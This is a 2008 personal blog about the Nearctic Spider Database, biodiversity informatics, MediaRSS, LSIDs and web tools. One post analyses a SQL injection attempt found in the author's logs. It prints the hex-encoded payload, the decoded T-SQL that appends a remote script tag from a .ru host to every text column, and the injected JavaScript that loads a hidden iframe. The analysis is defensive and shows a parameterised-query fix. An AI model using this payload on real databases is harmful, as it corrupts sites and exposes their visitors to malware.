Thursday, December 18, 2008

Cooliris on Eight Legs


For well over a year, I have been serving MediaRSS feeds from the Nearctic Spider Database (before Yahoo and Flickr!) and I am overjoyed to see that all the big guys are jumping on this extension to RSS 2.0. One in particular that blows me away is Cooliris, a plug-in for all modern browsers that allows one to navigate MediaRSS feeds in 3D. So, if you haven't yet downloaded and installed Cooliris, you may do so HERE. Then, you're welcome to see the feed of spiders HERE.
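For anyone curious what a consumer like Cooliris actually looks for, here's a rough JavaScript sketch (the feed path is a stand-in, not the real one) that walks a MediaRSS feed and pulls out each item's media:content URL:

var MEDIA_NS = "http://search.yahoo.com/mrss/"; // the Media RSS namespace
var xhr = new XMLHttpRequest();
xhr.open("GET", "/feeds/spiders.xml", true); // stand-in path for the spider feed
xhr.onreadystatechange = function () {
  if (xhr.readyState == 4 && xhr.status == 200) {
    var items = xhr.responseXML.getElementsByTagName("item");
    for (var i = 0; i < items.length; i++) {
      // each <item> carries a <media:content url="..."> (and usually a thumbnail) for the image
      var media = items[i].getElementsByTagNameNS(MEDIA_NS, "content")[0];
      if (media && window.console) console.log(media.getAttribute("url"));
    }
  }
};
xhr.send(null);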

Maybe I better take a second look at RSSBus...

Monday, November 3, 2008

Little E's

Because I work for the Encyclopedia of Life (EOL) and because I can tinker on the Nearctic Spider Database, I have the opportunity to try out various approaches to help mobilize data. One thing that concerns me about the current relationship between EOL and its content partners is that it is a nearly closed, 1:1 arrangement. In other words, content partners that come on board are encouraged to represent their data in one potentially massive XML document, much like a Google Sitemap. More information on what EOL would like to see future content partners produce can be found HERE. A potential outside consumer of these data will have no idea where to retrieve this XML document. Thus, the relationship between EOL and its content partners is closed. That is, until EOL releases some web services.

So, in an effort to help expose the data structure EOL is looking for, I made a link on every one of the species pages in the Nearctic Spider Database. Upon clicking these "little e's", you can catch a glimpse of what EOL is hoping its content partners will produce. These "little e's" don't really improve the relationship between EOL and its array of content partners, nor do they ease the effort on the part of content partners to make these documents, nor do they help us at EOL. So what's the point? What they do is share what I produced for EOL. If you can parse the data behind the "little e's", you can parse the big XML "sitemap" document I made for EOL as well.

The problem with sitemaps is that no one but the harvester knows where these sitemaps can be found. A Google sitemap, for instance, can sit in any folder on a website (though it is usually in the root folder and accessed as /sitemap.xml or /sitemap.gz). This is the same situation for EOL and its content partners; the "sitemap" can be found anywhere.

To finish off the "little e" approach, each page should have a link to the EOL content partner sitemap document, in which can be found links to all pages with "little e's". This would be somewhat similar to an OpenSearch description document, which carries instructions on how to make use of the search feed(s) available on a site. And of course, there should be a JSON flavour as a lighter-weight alternative to XML.

But, to make this of any use at all, we need a desktop reader like an RSS reader...something with the ability to shunt the data into the correct spot within a rich GUI-based classification (with some degree of certainty), thus forcing us to eventually develop far better online tree browsers. With all the bits described above, you'd come across a species page, click a button like an RSS feed button, download a sitemap containing a list of all species pages on the site you landed on, then browse through the content the way you want it organized.
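To make that concrete, here's a toy JavaScript sketch of the discovery-and-fetch step. None of this exists yet: the link rel value, the ?format=json switch, and the field names are all invented for illustration.

// find the advertised partner "sitemap" on the species page, OpenSearch-style
var links = document.getElementsByTagName("link"), sitemapUrl;
for (var i = 0; i < links.length; i++) {
  if (links[i].rel == "eol-partner-sitemap") sitemapUrl = links[i].href;
}

// grab the lighter-weight JSON flavour and list the species pages it points to
var xhr = new XMLHttpRequest();
xhr.open("GET", sitemapUrl + "?format=json", true);
xhr.onreadystatechange = function () {
  if (xhr.readyState == 4 && xhr.status == 200) {
    var sitemap = JSON.parse(xhr.responseText); // via json2.js or a native parser
    for (var j = 0; j < sitemap.taxa.length; j++) {
      if (window.console) console.log(sitemap.taxa[j].scientificName + " -> " + sitemap.taxa[j].url);
    }
  }
};
xhr.send(null);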

Saturday, October 18, 2008

Google Charts...Wow

Kevin Pfeiffer, an avid participant in the Nearctic Arachnologists' Forum, finally got me to do something about the Flash-based charts on the species pages in the Nearctic Spider Database. While these older charts were great at the time, they've had their day. So, in light of the sparklines that Rod Page integrated into a "Biodiversity Service Status" pinger, I thought I'd take a closer look at Google Charts. Wow. An added plus for this service is the truly stellar documentation.

Rather than using a terribly long URL to get the PNG for the chart, I use a proxy. This way, I can pass an identifier to a local script that then grabs the image and dumps it on the page. And, I can give the chart a file name of my choosing.
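To give a sense of why these URLs balloon, here is a rough sketch that assembles a simple bar chart of, say, monthly collection records. The parameters come from the Google Charts documentation; the counts and the /charts/ proxy path are made up.

var counts = [2, 5, 9, 21, 34, 18, 12, 7, 3, 1, 0, 0]; // records per month (made up)
var params = [
  "cht=bvs",                          // vertical bar chart
  "chs=400x150",                      // image size in pixels
  "chd=t:" + counts.join(","),        // text-encoded data
  "chds=0,40",                        // data scaling
  "chxt=x,y",                         // draw both axes
  "chxl=0:|J|F|M|A|M|J|J|A|S|O|N|D",  // month labels on the x axis
  "chco=336699"                       // bar colour
];
var chartUrl = "http://chart.apis.google.com/chart?" + params.join("&");
// Rather than exposing chartUrl, the species page asks for something like
// /charts/dolomedes_tenebrosus.png and the proxy script fetches chartUrl behind
// the scenes, then serves the PNG under that friendlier file name.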

Sunday, October 12, 2008

Long Tail of Biodiversity

At last count on the World Spider Catalog, there are 4345 species in the spider family Linyphiidae. This is second only to the jumping spiders. The latter are primarily tropical and subtropical, but linyphiids are predominantly found in the northern hemisphere, where, coincidentally, most of the world's arachnid systematists are also found. And, of course, there's very little accessible information on most of these species, either in print or on the web. A few notable exceptions are Tanasevitch's Linyphiid Spiders of the World, which contains flat lists of names organized in various ways, and the ever popular BugGuide gallery (few of whose images are identified to species). There is a smattering of other resources out there, but they are all hard to find. Both the Tree of Life and the Encyclopedia of Life have the equivalent of stub pages, so neither is particularly helpful.


A recent unlocking of these hidden gems is underway by Nina Sandlin, an Associate of Zoology at the Field Museum in Chicago. She has been building LinEpig, a photo gallery of linyphiid epigyna on Picasa Web Albums. Like most other online work on arachnids, LinEpig is built with love for the organisms and no budget (correct me if I'm wrong, Nina!). While taking images of the epigyna, Nina graciously shared the habitus images with the Nearctic Spider Database. While in Chicago recently, I chatted with Nina about Picasa. It comes close to what she wanted, but it falls short in a number of areas. The most important, in my opinion, is findability. Sure, she can tag her images with names, but her gallery is poorly exposed on Google and other search engines. However, there are some features in Picasa that make it attractive. It is relatively easy to upload, manage, and geotag images - though the geotagging could evidently use text boxes for people who already have coordinates on hand. Most importantly, the interface is clean, responsive and uncluttered.

Now the long tail...

Prior to Nina's efforts, there was very little (if any) linyphiid imagery on the web, especially the specialized images of the epigyna, which are a lot more useful than habitus images. If you've seen one linyphiid, you've pretty much seen them all (a few exceptions, of course). They are remarkably similar in shape & size, but their sexual characters, especially the males', are dramatically different. The big biodiversity aggregators like the Encyclopedia of Life have positioned themselves to present low-hanging fruit. That is, show the furry, charismatic megafauna (or fish) because there are many resources serving this sort of content. But, why? Wouldn't it make sense to instead provide better and more useful tools for folks like Nina to create and organize content for which there is either nothing or very little available elsewhere? Let's hope that in time, LifeDesk will provide a ladder for consumers of the content generated there to reach out to the furthest branches and leaves, where all the curiosities are found. But first, it'll have to contain tools and functionality useful for folks like Nina and for others to jump in and give her a hand.

Friday, July 25, 2008

Show Me...Crab Spiders on Bark



One of the DarwinCore elements for specimen and observation data is "habitat". To my knowledge, not a lot has been done with these data. Either there are actually few records cached at GBIF that have this field filled, or the data are in such a mess as to be (mostly) unusable. I certainly hope it's not the latter. No matter how messy, there is still a wealth of information here if one takes the time to sift through it. The data are not unlike folksonomies, and someone with more patience than me could probably develop a natural classification of these terms.

Faceted search is a first crack at making these data useful, because it certainly offers more trajectories into the data than ignoring these habitat notes would. For a first cut at this, I pulled 30 random contributed specimen records for each species in the Nearctic Spider Database and now merely display their full contents on the species pages. Then, I index the pages as always using my trusty Zoom Search. Voila, a quick way to do some rough, faceted searches. It's not perfect, but it's better than nothing. Where "crab spider bark" or "wolf spider beach" once produced no search results, there are now 5 and 17 results returned, respectively. Incidentally, Flickr produced 13 and 18 results, respectively, but many of the images are useless.

Sunday, July 20, 2008

Green Porno

I couldn't resist sharing these. Pure genius. Kudos to Isabella Rossellini.

SQL Injection Attacks!

I was browsing through my web logs this morning and discovered some clever attempts to hack into my database using a technique called SQL injection. Here's a portion of one line in the web log:

/data/canada_spiders/AllReferences.asp Letter=F;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434C415245204054205641524348415228323535292C...more crap here...4445414C4C4F43415445205461626C655F437572736F7220%20AS%20VARCHAR(4000));EXEC(@S);--

The semicolon after "Letter=F" above is an attempt to mark the close of the SQL within the page "/data/canada_spiders/AllReferences.asp" and everything else after it is crap that could be executed on the server. Had I constructed my SQL on the page to be something like:
SELECT * FROM [TABLE] WHERE [COLUMN] = "" & [LETTER F] & ""

...where [LETTER F] is the parameter passed from the URL, I would have exposed myself to something potentially serious. So, instead of:
SELECT * FROM [TABLE] WHERE [COLUMN] = "F"

...the executed SQL would have been:
SELECT * FROM [TABLE] WHERE [COLUMN] = "F";DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434C415245204054205641524348415228323535292C...more crap here...4445414C4C4F43415445205461626C655F437572736F7220%20AS%20VARCHAR(4000));EXEC(@S);--

Cool.
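For the record, the standard defence (and not necessarily how my pages are written) is to stop concatenating user input into the SQL string altogether and pass it as a parameter instead. A minimal classic-ASP sketch in JScript using ADO command parameters; conn is assumed to be an open ADODB.Connection, and the table and column names are hypothetical:

var letter = String(Request.QueryString("Letter"));       // e.g. "F", injected crap and all
var cmd = Server.CreateObject("ADODB.Command");
cmd.ActiveConnection = conn;
cmd.CommandText = "SELECT * FROM [References] WHERE [AuthorLetter] = ?";
// 200 = adVarChar, 1 = adParamInput; the payload is now treated as a harmless string value
cmd.Parameters.Append(cmd.CreateParameter("letter", 200, 1, 255, letter));
var rs = cmd.Execute();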

So, just what is all that crap? Well, it's a SQL Server-specific bit of code that has been hex-encoded. The fully decoded hex is as follows:
DECLARE @T VARCHAR(255),@C VARCHAR(255)
DECLARE Table_Cursor CURSOR FOR
SELECT a.name,b.name FROM sysobjects a,syscolumns b
WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0)
BEGIN
EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script src=http://www.bnrc.ru/ngg.js></script>''')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor

Hmm. What does this mean? Well, it's an attempt to do something very scary - update every text-type column in every user table to append a reference to a snippet of JavaScript. So, the next time any data are pulled from the database for presentation on a website, there is the potential to include hundreds of references to a remote JavaScript file.

So, what's in the JavaScript? This:
window.status="";
var cookieString = document.cookie;
var start = cookieString.indexOf("dssndd=");
if (start != -1){}else{
var expires = new Date();
expires.setTime(expires.getTime()+9*3600*1000);
document.cookie = "dssndd=update;expires="+expires.toGMTString();
try{
document.write("<iframe src=http://iogp.ru/cgi-bin/index.cgi?ad width=0 height=0 frameborder=0></iframe>");
}
catch(e)
{
};
}

OK, so an iframe is inserted. Cripes, will it ever end? What's in the iframe? A page with some obfuscated JavaScript that loads as the page renders. This is as far as I got. But, others have also discovered this and note that the JavaScript in that iframe is at least a redirect to msn.com. If you conduct a search for "ngg.js", you can pull up a whole heap of sites indexed by Google that have apparently been affected by this SQL injection attack. So, if you visit a web site, click a link and get mysteriously redirected to msn.com, something may have just happened to your browser.

But, I still have no idea what the ultimate end game is. What the heck is in the obfuscated JavaScript in the iframe? Anyone?

Saturday, July 19, 2008

Google Geocodes

Since I have been on a kick this weekend getting back into the mapping thing, I decided to see what was new in the world of the Google Maps API and discovered plenty of great new things. For example, folks have developed reverse geocoders. It's a shame, however, that the full ISO country names aren't used. Rather, only the country codes are made available via Google's geocode API. I would have much rather had the full country name and the full "AdministrativeAreaName" (i.e. the State or Province in Google Maps API parlance), because I could then use these in the AJAX data grid for contributors of specimen records to the Nearctic Spider Database. Similarly, applications like Specify could take advantage of this to help users clean or check their data as these are entered.
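Here's roughly what that looks like with the current (v2) Maps API, as best I recall it; map is assumed to be an existing GMap2 instance, and the response field names are from memory, so double-check them:

var geocoder = new GClientGeocoder();
GEvent.addListener(map, "click", function (overlay, latlng) {
  geocoder.getLocations(latlng, function (response) {
    if (!response || response.Status.code != 200) return;
    var place = response.Placemark[0];
    var country = place.AddressDetails.Country;     // yields only the ISO code, e.g. "CA"
    var admin = country.AdministrativeArea;         // e.g. "Alberta"
    document.getElementById("locality").value =
      admin.AdministrativeAreaName + ", " + country.CountryNameCode;
    document.getElementById("coords").value =
      latlng.lat().toFixed(5) + ", " + latlng.lng().toFixed(5);
  });
});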

Nevertheless, I tweaked my old Google Map Geocoder to take advantage of all these advancements. The point of this little gadget is to click a map and get the location and coordinates. In this era of GPS units and iPhones, this may be rather pointless. But it was fun to see what I could do in an hour or so.

Friday, July 18, 2008

Simple Mapper

With the recent mapping craze this past decade and the fascination with AJAX tiling, a serious deficiency has been the lack of a simple mechanism to produce a black & white line map with points to mark collection locations for use in an outgoing manuscript. While at the recent American Arachnological Society meetings at Berkeley, California, I casually mentioned in a presentation I gave about the Nearctic Spider Database that someone should make such a service. Well, I made one...at least the start of one, right HERE.

I know, I know, yet another mapping service. But, this one serves a very specific purpose. It could no doubt be expanded and made more customizable, with different point styles for multiple species (a bit tougher) and an option to use a global map instead (trivial), but it's a start toward producing something that hopefully satisfies a very different need.

Monday, May 12, 2008

Life Science Identifiers (LSIDs) - Why?

The Catalogue of Life (CoLP) recently released its 2008 checklist and has now implemented Life Science Identifiers (LSIDs). In the past, the Catalogue of Life changed its identifiers with every new version, thus forcing database owners who made use of CoLP names and identifiers to reconstruct their databases if they wished to maintain some sort of external linking to an authoritative source.

If you're not familiar with LSIDs, this is from the SourceForge LSID resolution project:

Life Science Identifiers (LSIDs) are persistent, location-independent, resource identifiers for uniquely naming biologically significant resources including species names, concepts, occurrences, genes or proteins, or data objects that encode information about them. To put it simply, LSIDs are a way to identify and locate pieces of biological information on the web.
This is how LSIDs are constructed:
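In general form, an LSID is urn:lsid:<Authority>:<Namespace>:<ObjectID>, with an optional trailing :<Revision>. For example, urn:lsid:ubio.org:namebank:2072956 names object 2072956 in uBio's NameBank, and the ":ac2008" tacked onto the Catalogue of Life example below is a revision.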


So, what can one do with an LSID? Well, given an LSID, one can retrieve some metadata for that data object. This assumes, of course, that the authority at the other end is alive and ready to serve the metadata. There is no central authority, as there is with the Digital Object Identifiers (DOIs) used by the publishing industry.

For starters, one can resolve LSIDs using various online resources. Examples:
  1. Biodiversity Information Standards (TDWG): LSID resolver

  2. Rod Page: LSID tester
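For the programmatically inclined, resolution can also go through an HTTP proxy such as TDWG's. A sketch only: the proxy URL form below is from memory, and cross-domain rules mean you would realistically do this from a server-side script rather than the browser.

var lsid = "urn:lsid:ubio.org:namebank:2072956";
var xhr = new XMLHttpRequest();
xhr.open("GET", "http://lsid.tdwg.org/" + lsid, true); // proxy form is an assumption
xhr.onreadystatechange = function () {
  if (xhr.readyState == 4 && xhr.status == 200) {
    // the authority answers with RDF/XML metadata describing the object
    alert(xhr.responseText.substring(0, 500));
  }
};
xhr.send(null);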


Because of the distributed nature of LSID authorities (it's ultimately based on DNS), there is of course nothing preventing the same taxon name from having multiple identifiers, or one authority from serving multiple LSIDs for the same taxon name. For example, the name string for the fishing spider Dolomedes tenebrosus Hentz, 1844 has no fewer than 3 LSIDs issued by three different authorities:

uBio: urn:lsid:ubio.org:namebank:2072956
Catalogue of Life 2008: urn:lsid:catalogueoflife.org:taxon:f3b7cf14-29c1-102b-9a4a-00304854f820:ac2008 (ugh!)
The World Spider Catalog: urn:lsid:amnh.org:spidersp:019664

The uBio and the Catalogue of Life LSIDs for this spider resolve, but the AMNH LSID is nothing more than a pointer at this stage because, at the time of writing, there is no functioning resolution service behind it.

Which LSID is a database owner supposed to use? Are LSIDs meant to be currencies that either crumble or persist under Darwinian market pressures? What I want to do is store an LSID in my relational database such that I can more confidently link names with other sources of information, such as type specimens, gene sequences, synonyms, specimens, etc. The uBio LSID above is nice and compact, but no one besides me and uBio would use it. Norm Platnick wasn't aware that uBio had LSIDs for spider names! The World Spider Catalog LSID above is also nice and compact, but it doesn't resolve. The Catalogue of Life LSID is downright awful because I can't merely use the object identifier as a stand-alone integer.

So, I'll continue to use "Dolomedes tenebrosus Hentz, 1844", thank you very much. A decentralized identifier system is failing me.

Wednesday, April 16, 2008

Who's Organizing the Type Specimens

Circulating on Taxacom and elsewhere were a note and a petition that have me really worried:

On 26th March 2008 the University Board of Utrecht University, The Netherlands, informed the employees of the Utrecht Herbarium that as of 1 June 2008 the Herbarium is to be closed and, with immediate effect, access to the collections, from national as well as international workers, is to cease.

The above is straight off the Utrecht University website HERE where you can at least sign the online petition.

Where is the real source of this alarming decision? Do administrators see the doors to the herbarium as already closed so it's a simple decision to just bolt them shut?

Tim Robertson (GBIF) has been at the EOL informatics offices these past few days, where some interesting ideas have been flying around. One of GBIF's original goals, as near as I can remember, was to expose the physical location and metadata for type specimens. But, I think a barrier to making this happen was the concentration on a distributed model to harvest and display ALL specimen and observational data in a consistent fashion. These are important sociological considerations, but they are tangential to the goal. What I would love to see is a simple web page for curators to input their type specimen data. Forget about the distributed data model. Type the data in and get an assigned LSID or some other identifier that can be used in perpetuity. Also type in the citation for the original description. Those three bits will serve as the most important scaffolding for all of biology. The metadata schema (if you still think in XML docs) is also laughably easy, and the services to be built off this are embarrassingly useful. It is an immense source of pride for institutions (and curators!) to tell the world what type specimens are held behind their walls. Administrators key in on that.
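To put the "laughably easy" claim in concrete terms, a record needs little more than the following sketch. The field names, the identifier, the holding institution, and the citation are all invented placeholders, just to show how little is actually needed per type specimen:

var typeRecord = {
  identifier: "urn:lsid:example.org:types:12345",         // assigned once, used in perpetuity
  scientificName: "Dolomedes tenebrosus Hentz, 1844",     // example name only
  typeStatus: "holotype",
  institution: "Hypothetical Museum of Natural History",  // who holds it and where
  locality: "wet collection, room 214",
  originalDescription: "Hentz, N.M. 1844. [full citation of the original description]"
};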

Tim Robertson and the other developers in the global informatics community are a passionate bunch; they can see around corners, recognize the obstacles, and want the projects they represent to be huge successes. So, congrats Tim for your work on mapping, and I hope there are other great things to come.

Tuesday, April 15, 2008

Just Gimme the Current Name!

As a graduate student who collected a bunch of names to be stuffed into an Appendix, I found it was not a trivial task to ensure the names I used followed the currently recognized nomenclature. One of the first things a reviewer of any publication containing an Appendix of names will do is check that the names are all correct. In spider circles, that means several dozen trips to Norm Platnick's World Spider Catalog. It would be so much easier for everyone involved if Norm had one big text box in which people could paste all the names and have every one cross-checked against what is in the Catalog.

Coincidentally, it appears that many people who visit the Nearctic Spider Database use its search box just to get the full name string. I wonder how many searches on Google are the same! So, I made one of those big text boxes. Sure, there are programmatic issues. But, I can catch those names that might potentially be ambiguous and tell you about them. I can also tell you if you misspelled a name or if a name you searched on isn't in The Nearctic Spider Database...remember that the database is regionally centric...and someone (me!) has to keep on top of potential species introductions, treatments, etc. because any checklist or database will never be complete.
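Conceptually, a checker like this amounts to little more than the following toy sketch; the element ids, the namecheck.asp endpoint, and its replies are hypothetical, not the actual implementation.

function checkNames() {
  var pasted = document.getElementById("namebox").value.split(/\r?\n/);
  for (var i = 0; i < pasted.length; i++) {
    var name = pasted[i].replace(/^\s+|\s+$/g, ""); // trim whitespace
    if (!name) continue;
    var xhr = new XMLHttpRequest();
    xhr.open("GET", "/tools/namecheck.asp?name=" + encodeURIComponent(name), false);
    xhr.send(null);
    // expected (hypothetical) replies: the accepted name string, "AMBIGUOUS", or "NOT FOUND"
    document.getElementById("results").innerHTML += name + " : " + xhr.responseText + "<br/>";
  }
}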

So, give it a shot:

Wednesday, March 26, 2008

I Got Useful Data...and Caught You Unaware

A recent reply to a post in Taxacom got me thinking more deeply about capturing workflows (see thread):

The 'becomes part of daily routines on the workdesks of experts' is a
crucial part of this 'revolution' - the few experts left need an
incentive to abandon their word processors/spreadsheets/databases and
the incentive would be a workdesk with all the comfort factors that
these software applications give them and a whole heap of bonus
attributes which make it a no-brainer to adopt ... If (big if) the
majority of experts used this workdesk the
adSense-like/referral/ebay-feedback stuff going on in the background
would automatically improve the GBIF (and others - EoL??) content. The
good stuff rises the bad stuff falls - its always been this way, based
on a traditionally published monograph/fauna/flora/mycota/biota
typically on a 10-25 year cycle; in the 21st century digital age it
should be a tad quicker.

Paul


I'm happy to hear people are beginning to think of a "workdesk" as I envision the EOL WorkBench, which coincidentally I am internally calling "LifeDesk". This is how I described it some time ago on Taxacom (here). My thinking has shifted somewhat since then, but the give & take concept still holds.

A few concrete examples:

I modified my twirly, AJAXy reference look-up tool (also present on some exemplar EOL species pages like this one) to actually store the reprint metadata from CrossRef before it gets passed through to the user. The user gets the benefit of knowing there's a reprint available to download - they just click the little icon a second time - and I get the benefit of all the metadata for later use.

In doing some reading and fumbling with Adobe AIR, I stumbled across PhotoSpread (PDF). This app is a clever hybrid between Excel and Flickr. Dragging and dropping images coordinates regroupings or filters, and as a consequence, metadata tags are automatically created.

So, while I think a "WorkBench", "WorkDesk", or "LifeDesk" focus for development is headed in the right direction, we should be looking for shortcuts like these that capture user activity, use third party APIs in the background, and later repurpose the data in other interesting ways. If we are going to parasitize systematists' workflows, we had best get every ounce of potential data out of the time they put in.

Sunday, March 16, 2008

Where's David?

It has been an exceptionally long time since the last post. But, there were a few life-changing events that took precedence.

For starters, I'm now the WorkBench project leader for the Encyclopedia of Life and am living on Cape Cod with my family.



The Canadian Arachnologist and Spider WebWatch sites are still served from a desktop server. But, I have passed the editorial torch for the newsletter to Dr. Robin Leech.

I am also in the midst of buying my first home, which is no end of fun. Banks are quick to take your money, but aren't so quick to give it away, especially if your credit rating is invisible from the other side of an international border.

Just to prove that I have been toying with new things, here's a list containing a taste of things to come with the EOL WorkBench, which, by the way, I'm pushing to rename. I'll let you fill in the blanks... ;)~

Drupal
ExtJS
Biblio::Citation::Parser
jQuery multiple autocomplete